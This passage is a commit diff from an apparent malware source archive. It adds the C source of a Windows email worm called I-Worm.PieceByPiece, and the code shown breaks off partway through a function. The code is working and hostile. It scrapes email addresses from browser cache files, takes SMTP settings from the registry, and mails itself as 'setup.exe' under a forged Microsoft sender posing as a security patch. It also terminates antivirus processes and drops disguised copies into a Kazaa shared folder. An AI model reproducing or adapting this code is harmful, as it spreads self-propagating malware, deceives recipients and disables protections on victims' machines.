mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
Add files via upload
This commit is contained in:
parent
9cbdb38457
commit
1ffdfd1526
878
Win32/I-Worm.PieceByPiece.c
Normal file
878
Win32/I-Worm.PieceByPiece.c
Normal file
@ -0,0 +1,878 @@
|
|||||||
|
/*
|
||||||
|
I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
|
||||||
|
For educational purpose only. Distribute under GPL.
|
||||||
|
Some lyrics from the song that inspired me:
|
||||||
|
|
||||||
|
"Cause nothing ever lasts forever
|
||||||
|
We're like flowers in this vase, together
|
||||||
|
You and me, it's pulling me down
|
||||||
|
Tearing my down, piece by piece
|
||||||
|
And you can't see
|
||||||
|
That's it's like a disease
|
||||||
|
Killing me now, it's so hard to breathe"
|
||||||
|
-Feeder <Piece by Piece>
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <winsock.h>
|
||||||
|
#include <fstream.h>
|
||||||
|
#include <tlhelp32.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
|
||||||
|
//--------------------------------------GLOBAL VARIABLES-------------------------------------
|
||||||
|
|
||||||
|
HWND hwnd;
|
||||||
|
WORD version = MAKEWORD(1,1);
|
||||||
|
WSADATA wsaData;
|
||||||
|
int nRet;
|
||||||
|
char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
|
||||||
|
char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
|
||||||
|
char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
|
||||||
|
SOCKET theSocket;
|
||||||
|
int i,err=0,c=0,connected=0,tim,sending=0;
|
||||||
|
SYSTEMTIME time;
|
||||||
|
double k;
|
||||||
|
DWORD basesize,ProcessId;
|
||||||
|
|
||||||
|
//--------------------------------------WNDPROC-----------------------------------------------
|
||||||
|
|
||||||
|
LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
|
||||||
|
|
||||||
|
//--------------------------------------GETASC------------------------------------------------
|
||||||
|
|
||||||
|
int getasc(char chr[1]) {
|
||||||
|
int i=0;
|
||||||
|
char c[1];
|
||||||
|
|
||||||
|
for (i=0;i<257;i++) {
|
||||||
|
c[0]=i;
|
||||||
|
if (chr[0]==c[0]) { return(i); }
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------BASE64-----------------------------------------------
|
||||||
|
|
||||||
|
void base64(char *file) { //Encodes a file using the "base 64" encoding
|
||||||
|
WIN32_FIND_DATA fis; //It's kinna shitty code, but it works just GREAT!
|
||||||
|
int i,j,n,done=0,k=0,lin=0;
|
||||||
|
double c=0;
|
||||||
|
char tmp[7];
|
||||||
|
DWORD totsize;
|
||||||
|
char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
|
||||||
|
|
||||||
|
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
|
||||||
|
|
||||||
|
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
|
||||||
|
|
||||||
|
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
|
||||||
|
|
||||||
|
fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
|
||||||
|
FindFirstFile(file,&fis);
|
||||||
|
totsize=fis.nFileSizeLow; //Get the file size in bytes
|
||||||
|
for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
|
||||||
|
|
||||||
|
buc1[0]=0;
|
||||||
|
xxx[0]=0;
|
||||||
|
f.get(cx[1]);
|
||||||
|
j=getasc(&cx[1]);
|
||||||
|
itoa(j,cx2,2);
|
||||||
|
if (strlen(cx2)<8) {
|
||||||
|
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
|
||||||
|
buc1[i]=0;
|
||||||
|
strcat(buc1,cx2);
|
||||||
|
} else strcpy(buc1,cx2);
|
||||||
|
buc2[0]=0;
|
||||||
|
f.get(cx[1]);
|
||||||
|
j=getasc(&cx[1]);
|
||||||
|
itoa(j,cx2,2);
|
||||||
|
if (strlen(cx2)<8) {
|
||||||
|
for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
|
||||||
|
buc2[i]=0;
|
||||||
|
strcat(buc2,cx2);
|
||||||
|
} else strcpy(buc2,cx2);
|
||||||
|
buc3[0]=0;
|
||||||
|
f.get(cx[1]);
|
||||||
|
j=getasc(&cx[1]);
|
||||||
|
itoa(j,cx2,2);
|
||||||
|
if (strlen(cx2)<8) {
|
||||||
|
for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
|
||||||
|
buc3[i]=0;
|
||||||
|
strcat(buc3,cx2);
|
||||||
|
} else strcpy(buc3,cx2);
|
||||||
|
xxx[0]=0;
|
||||||
|
strcpy(xxx,buc1);
|
||||||
|
done=0;
|
||||||
|
k=0;
|
||||||
|
while (done!=24) {
|
||||||
|
for (i=done;i<done+6;i++) {
|
||||||
|
tmp[k]=xxx[i];
|
||||||
|
k++;
|
||||||
|
}
|
||||||
|
tmp[k]=0;
|
||||||
|
done+=6;
|
||||||
|
n=strtol(tmp,NULL,2);
|
||||||
|
g<<base[n];
|
||||||
|
lin++;
|
||||||
|
if (lin==76) {
|
||||||
|
g<<endl;lin=0;
|
||||||
|
}
|
||||||
|
tmp[0]=0;
|
||||||
|
k=0;
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
//One char left so add 4 0s at the end
|
||||||
|
if (totsize%3==1) {
|
||||||
|
buc1[0]=0;
|
||||||
|
f.get(cx[1]);
|
||||||
|
j=getasc(&cx[1]);
|
||||||
|
itoa(j,cx2,2);
|
||||||
|
if (strlen(cx2)<8) {
|
||||||
|
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
|
||||||
|
buc1[i]=0;
|
||||||
|
strcat(buc1,cx2);
|
||||||
|
} else strcpy(buc1,cx2);
|
||||||
|
strcat(buc1,"0000");
|
||||||
|
done=0;
|
||||||
|
k=0;
|
||||||
|
while (done!=12) {
|
||||||
|
for (i=done;i<done+6;i++) {
|
||||||
|
tmp[k]=buc1[i];
|
||||||
|
k++;
|
||||||
|
}
|
||||||
|
tmp[k]=0;
|
||||||
|
done+=6;
|
||||||
|
n=strtol(tmp,NULL,2);
|
||||||
|
g<<base[n];
|
||||||
|
lin++;
|
||||||
|
if (lin==76) {
|
||||||
|
g<<endl;lin=0;
|
||||||
|
}
|
||||||
|
tmp[0]=0;
|
||||||
|
k=0;
|
||||||
|
}
|
||||||
|
g<<"==";
|
||||||
|
}
|
||||||
|
|
||||||
|
//Two chars left so add 2 0s at the end
|
||||||
|
if (totsize%3==2) {
|
||||||
|
buc1[0]=0;
|
||||||
|
f.get(cx[1]);
|
||||||
|
j=getasc(&cx[1]);
|
||||||
|
itoa(j,cx2,2);
|
||||||
|
if (strlen(cx2)<8) {
|
||||||
|
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
|
||||||
|
buc1[i]=0;
|
||||||
|
strcat(buc1,cx2);
|
||||||
|
} else strcpy(buc1,cx2);
|
||||||
|
strcat(buc1,"00");
|
||||||
|
done=0;
|
||||||
|
k=0;
|
||||||
|
while (done!=18) {
|
||||||
|
for (i=done;i<done+6;i++) {
|
||||||
|
tmp[k]=buc1[i];
|
||||||
|
k++;
|
||||||
|
}
|
||||||
|
tmp[k]=0;
|
||||||
|
done+=6;
|
||||||
|
n=strtol(tmp,NULL,2);
|
||||||
|
g<<base[n];
|
||||||
|
lin++;
|
||||||
|
if (lin==76) {
|
||||||
|
g<<endl;lin=0;
|
||||||
|
}
|
||||||
|
tmp[0]=0;
|
||||||
|
k=0;
|
||||||
|
}
|
||||||
|
g<<"=";
|
||||||
|
}
|
||||||
|
|
||||||
|
f.close();
|
||||||
|
g.close();
|
||||||
|
//Get the size of the encoded file
|
||||||
|
FindFirstFile("C:\\Msbootlog.sys",&fis);
|
||||||
|
basesize=fis.nFileSizeLow;
|
||||||
|
}
|
||||||
|
//--------------------------------------SENDMAIL---------------------------------------------
|
||||||
|
|
||||||
|
void sendmail() { //Sends an e-mail with MIME encoding
|
||||||
|
int ran;
|
||||||
|
|
||||||
|
sending=1;
|
||||||
|
//"HELO" the server
|
||||||
|
strcpy(myBuf, "HELO <");
|
||||||
|
strcat(myBuf,helo);
|
||||||
|
strcat(myBuf,">\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
recv(theSocket,Buf,sizeof(Buf),0);
|
||||||
|
|
||||||
|
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
|
||||||
|
strcpy(myBuf, "MAIL FROM:<");
|
||||||
|
strcat(myBuf,email);
|
||||||
|
strcat(myBuf,">\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
recv(theSocket,Buf,sizeof(Buf),0);
|
||||||
|
}
|
||||||
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
||||||
|
|
||||||
|
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
|
||||||
|
|
||||||
|
GetSystemTime(&time);
|
||||||
|
srand(time.wSecond);
|
||||||
|
ran=rand();
|
||||||
|
while (ran>c) {
|
||||||
|
srand(c);
|
||||||
|
ran=ran-rand();
|
||||||
|
}
|
||||||
|
if (ran<0) ran=ran*(-1);
|
||||||
|
strcpy(myBuf, "RCPT TO:<");
|
||||||
|
strcat(myBuf, emails[ran]);
|
||||||
|
strcat(myBuf, ">\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
recv(theSocket,Buf,sizeof(Buf),0);
|
||||||
|
}
|
||||||
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
||||||
|
|
||||||
|
if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
|
||||||
|
strcpy(myBuf, "DATA\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
recv(theSocket,Buf,sizeof(Buf),0);
|
||||||
|
}
|
||||||
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
||||||
|
|
||||||
|
if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
|
||||||
|
|
||||||
|
if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
|
||||||
|
strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
} else { //if we find a new address
|
||||||
|
strcpy(myBuf, "From: <");
|
||||||
|
strcat(myBuf, email);
|
||||||
|
strcat(myBuf, ">\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "Subject: Hello\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, " boundary = \"bla\"\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "X-Priority: 3\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "--bla\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "--bla\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, " name = \"setup.exe\"\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, " filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
//Send the file byte by byte
|
||||||
|
fstream f("C:\\Msbootlog.sys",ios::in);
|
||||||
|
for (k=0;k<basesize;k++) {
|
||||||
|
f.get(ch[1]);
|
||||||
|
strcpy(myBuf,&ch[1]);
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
}
|
||||||
|
f.close();
|
||||||
|
|
||||||
|
strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
|
||||||
|
recv(theSocket,Buf,sizeof(Buf),0);
|
||||||
|
}
|
||||||
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
||||||
|
|
||||||
|
strcpy(myBuf, "QUIT\x0d\x0a");
|
||||||
|
send(theSocket,myBuf,strlen(myBuf),0);
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------GETPROCESSMODULE------------------------------------
|
||||||
|
|
||||||
|
BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
|
||||||
|
LPMODULEENTRY32 lpMe32, DWORD cbMe32)
|
||||||
|
{
|
||||||
|
BOOL bRet = FALSE;
|
||||||
|
BOOL bFound = FALSE;
|
||||||
|
HANDLE hModuleSnap = NULL;
|
||||||
|
MODULEENTRY32 me32 = {0};
|
||||||
|
|
||||||
|
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
|
||||||
|
if (hModuleSnap == (HANDLE)-1)
|
||||||
|
return (FALSE);
|
||||||
|
|
||||||
|
me32.dwSize = sizeof(MODULEENTRY32);
|
||||||
|
|
||||||
|
if (Module32First(hModuleSnap, &me32))
|
||||||
|
{
|
||||||
|
do
|
||||||
|
{
|
||||||
|
if (me32.th32ModuleID == dwModuleID)
|
||||||
|
{
|
||||||
|
CopyMemory (lpMe32, &me32, cbMe32);
|
||||||
|
bFound = TRUE;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
while (!bFound && Module32Next(hModuleSnap, &me32));
|
||||||
|
|
||||||
|
bRet = bFound;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
bRet = FALSE;
|
||||||
|
CloseHandle (hModuleSnap);
|
||||||
|
|
||||||
|
return (bRet);
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------PROCESSES---------------------------------------------
|
||||||
|
|
||||||
|
BOOL processes() //Various stuff with processes
|
||||||
|
{
|
||||||
|
HANDLE hProcessSnap = NULL;
|
||||||
|
BOOL bRet = FALSE;
|
||||||
|
PROCESSENTRY32 pe32 = {0};
|
||||||
|
|
||||||
|
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||||
|
if (hProcessSnap == (HANDLE)-1)
|
||||||
|
return (FALSE);
|
||||||
|
pe32.dwSize = sizeof(PROCESSENTRY32);
|
||||||
|
if (Process32First(hProcessSnap, &pe32))
|
||||||
|
{
|
||||||
|
DWORD dwPriorityClass;
|
||||||
|
BOOL bGotModule = FALSE;
|
||||||
|
MODULEENTRY32 me32 = {0};
|
||||||
|
do
|
||||||
|
{
|
||||||
|
bGotModule = GetProcessModule(pe32.th32ProcessID,
|
||||||
|
pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32));
|
||||||
|
if (bGotModule)
|
||||||
|
{
|
||||||
|
HANDLE hProcess;
|
||||||
|
hProcess = OpenProcess (PROCESS_ALL_ACCESS,
|
||||||
|
FALSE, pe32.th32ProcessID);
|
||||||
|
dwPriorityClass = GetPriorityClass (hProcess);
|
||||||
|
//Get the virus' filename
|
||||||
|
if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
|
||||||
|
|
||||||
|
//Anti AVs
|
||||||
|
if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
|
||||||
|
TerminateProcess(hProcess,0);
|
||||||
|
}
|
||||||
|
|
||||||
|
//Close the handle
|
||||||
|
CloseHandle (hProcess);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
while (Process32Next(hProcessSnap, &pe32));
|
||||||
|
bRet = TRUE;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
bRet = FALSE;
|
||||||
|
CloseHandle (hProcessSnap);
|
||||||
|
return (bRet);
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------FINDSERVER--------------------------------------------
|
||||||
|
|
||||||
|
void findserver() { //Gets a SMTP server and user name from the registry (if possible)
|
||||||
|
int i,j;
|
||||||
|
char key2[256];
|
||||||
|
unsigned char acc[1024],smtp[1024],eml[1024];
|
||||||
|
DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
|
||||||
|
HKEY hKey;
|
||||||
|
|
||||||
|
//Try getting a SMTP server from registry
|
||||||
|
strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
|
||||||
|
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
|
||||||
|
RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
|
||||||
|
j=strlen(key2);
|
||||||
|
for (i=0;i<8;i++){
|
||||||
|
key2[j+i]=acc[i];
|
||||||
|
}
|
||||||
|
key2[j+i]=0;
|
||||||
|
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
|
||||||
|
RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
|
||||||
|
i=0; //the new one
|
||||||
|
while (smtp[i]!=0) {
|
||||||
|
server[i]=smtp[i]; //Now this is the SMTP server
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
server[i]=0;
|
||||||
|
//Get the e-mail
|
||||||
|
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
|
||||||
|
RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
|
||||||
|
i=0; //the new one
|
||||||
|
while (eml[i]!=0) {
|
||||||
|
email[i]=eml[i]; //Now this is the "FROM:" e-mail
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
email[i]=0;
|
||||||
|
}
|
||||||
|
//Set a new "HELO" domain
|
||||||
|
i=strlen(email)-1;
|
||||||
|
j=0;
|
||||||
|
while (email[i]!='@') {
|
||||||
|
helo[j]=email[i];
|
||||||
|
j++;
|
||||||
|
i--;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
helo[j]=0;
|
||||||
|
strrev(helo);
|
||||||
|
//end
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------FINDMAIL----------------------------------------------
|
||||||
|
|
||||||
|
void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
|
||||||
|
{
|
||||||
|
int ik,j=0;
|
||||||
|
char lin[256],*start,ch[1];
|
||||||
|
|
||||||
|
fstream f(file,ios::in);
|
||||||
|
while (f.get(lin,256))
|
||||||
|
{
|
||||||
|
start=strstr(lin,"mailto:");
|
||||||
|
if (start!=0)
|
||||||
|
{
|
||||||
|
j=0;
|
||||||
|
c++;
|
||||||
|
ik=start-lin+7;
|
||||||
|
ch[1]=lin[ik];
|
||||||
|
while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
|
||||||
|
{
|
||||||
|
emails[c][j]=ch[1];
|
||||||
|
j++;
|
||||||
|
ik++;
|
||||||
|
ch[1]=lin[ik];
|
||||||
|
}
|
||||||
|
emails[c][j]=0;
|
||||||
|
}
|
||||||
|
f.get();
|
||||||
|
}
|
||||||
|
f.close();
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------FINDFILES---------------------------------------------
|
||||||
|
|
||||||
|
void findfiles() { //Searches for .htm files in the temp. directories
|
||||||
|
WIN32_FIND_DATA f;
|
||||||
|
HANDLE hf;
|
||||||
|
int k=0;
|
||||||
|
char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
|
||||||
|
|
||||||
|
strcpy(pth2,windir);
|
||||||
|
strcat(pth2,"\\Temporary Internet Files\\*");
|
||||||
|
hf=FindFirstFile(pth2,&f);
|
||||||
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
|
||||||
|
while (FindNextFile(hf,&f)!=0 && k<20) {
|
||||||
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
|
||||||
|
k++;
|
||||||
|
}
|
||||||
|
FindClose(hf);
|
||||||
|
strcpy(pth2,windir);
|
||||||
|
strcat(pth2,"\\Temporary Internet Files\\");
|
||||||
|
strcat(pth2,pth1);
|
||||||
|
strcat(pth2,"\\*");
|
||||||
|
k=0;
|
||||||
|
hf=FindFirstFile(pth2,&f);
|
||||||
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
|
||||||
|
while (FindNextFile(hf,&f)!=0 && k<20) {
|
||||||
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
|
||||||
|
k++;
|
||||||
|
}
|
||||||
|
FindClose(hf);
|
||||||
|
strcpy(pth2,windir);
|
||||||
|
strcat(pth2,"\\Temporary Internet Files\\");
|
||||||
|
strcat(pth2,pth1);
|
||||||
|
strcat(pth2,"\\");
|
||||||
|
strcat(pth2,pth3);
|
||||||
|
strcpy(pth,pth2);
|
||||||
|
strcat(pth,"\\");
|
||||||
|
strcat(pth2,"\\*.htm");
|
||||||
|
k=0;
|
||||||
|
hf=FindFirstFile(pth2,&f);
|
||||||
|
while (FindNextFile(hf,&f)!=0 && k<70) {
|
||||||
|
if (f.cFileName[0]!='.') {
|
||||||
|
strcpy(path,pth);
|
||||||
|
strcat(path,f.cFileName);
|
||||||
|
findmail(path);
|
||||||
|
}
|
||||||
|
k++;
|
||||||
|
}
|
||||||
|
FindClose(hf);
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------CONECT------------------------------------------------
|
||||||
|
|
||||||
|
int conect() { //Connects to a server using "Winsock"
|
||||||
|
|
||||||
|
// Start up Winsock
|
||||||
|
i=WSAStartup(version, &wsaData);
|
||||||
|
if (i!=0) {return(0);}
|
||||||
|
|
||||||
|
// Store information about the server
|
||||||
|
LPHOSTENT lpHostEntry;
|
||||||
|
|
||||||
|
lpHostEntry = gethostbyname(server);
|
||||||
|
if (lpHostEntry == NULL) {
|
||||||
|
WSACleanup();
|
||||||
|
connected=0;
|
||||||
|
return(0);
|
||||||
|
} else connected=1; //This means we're connected
|
||||||
|
//Get important data
|
||||||
|
if (err==0) { //If we didn't run this allready and got an error
|
||||||
|
findserver();
|
||||||
|
findfiles();
|
||||||
|
}
|
||||||
|
// Create the socket
|
||||||
|
theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
||||||
|
if (theSocket == INVALID_SOCKET) {
|
||||||
|
WSACleanup();
|
||||||
|
connected=0;
|
||||||
|
return(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
SOCKADDR_IN saServer;
|
||||||
|
saServer.sin_family = AF_INET;
|
||||||
|
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
|
||||||
|
saServer.sin_port = htons(25);
|
||||||
|
// Connect to the server
|
||||||
|
nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));
|
||||||
|
if (nRet == SOCKET_ERROR) {
|
||||||
|
WSACleanup();
|
||||||
|
connected=0;
|
||||||
|
return(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
nRet = recv(theSocket,Buf,sizeof(Buf),0);
|
||||||
|
if (nRet == SOCKET_ERROR) {
|
||||||
|
WSACleanup();
|
||||||
|
connected=0;
|
||||||
|
return(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
||||||
|
if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
|
||||||
|
sendmail();
|
||||||
|
}
|
||||||
|
//Close the connection
|
||||||
|
closesocket(theSocket);
|
||||||
|
// Shutdown Winsock
|
||||||
|
WSACleanup();
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------KAZAA-----------------------------------------------
|
||||||
|
|
||||||
|
void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
|
||||||
|
int i;
|
||||||
|
char kaza[256],kfile[3][20];
|
||||||
|
unsigned char kpth[1024];
|
||||||
|
DWORD kpthlen=sizeof(kpth);
|
||||||
|
HKEY hKey;
|
||||||
|
|
||||||
|
//The filenames
|
||||||
|
strcpy(kfile[0],"\\mirc6.exe");
|
||||||
|
strcpy(kfile[1],"\\winamp3.exe");
|
||||||
|
strcpy(kfile[2],"\\wincrack.exe");
|
||||||
|
strcpy(kfile[3],"\\icq2002.exe");
|
||||||
|
//Get the path to Kazaa from the reg.
|
||||||
|
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
|
||||||
|
RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
if (kpth[0]>64 && kpth[0]<123) {
|
||||||
|
i=0;
|
||||||
|
while (kpth[i]!=0) {
|
||||||
|
kaza[i]=kpth[i];
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
kaza[i]=0;
|
||||||
|
}
|
||||||
|
GetSystemTime(&time);
|
||||||
|
srand(time.wSecond);
|
||||||
|
if (rand()%5==0) strcat(kaza,kfile[3]);
|
||||||
|
else if (rand()%4==0) strcat(kaza,kfile[2]);
|
||||||
|
else if (rand()%3==0) strcat(kaza,kfile[1]);
|
||||||
|
else if (rand()%2==0) strcat(kaza,kfile[0]);
|
||||||
|
CopyFile(file,kaza,FALSE);
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------INFECTWIN-------------------------------------------
|
||||||
|
|
||||||
|
void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
|
||||||
|
HKEY hKey;
|
||||||
|
unsigned char val[256];
|
||||||
|
char rnd[6];
|
||||||
|
int i=0;
|
||||||
|
|
||||||
|
strcpy(winbkup,windir);
|
||||||
|
strcat(winbkup,"\\System\\winsys");
|
||||||
|
GetSystemTime(&time);
|
||||||
|
srand(time.wSecond);
|
||||||
|
itoa(rand(),rnd,10);
|
||||||
|
strcat(winbkup,rnd);
|
||||||
|
strcat(winbkup,".exe");
|
||||||
|
//Copy file to Windows
|
||||||
|
CopyFile(file,winbkup,TRUE);
|
||||||
|
//Just in case there is no WinZip, use this path
|
||||||
|
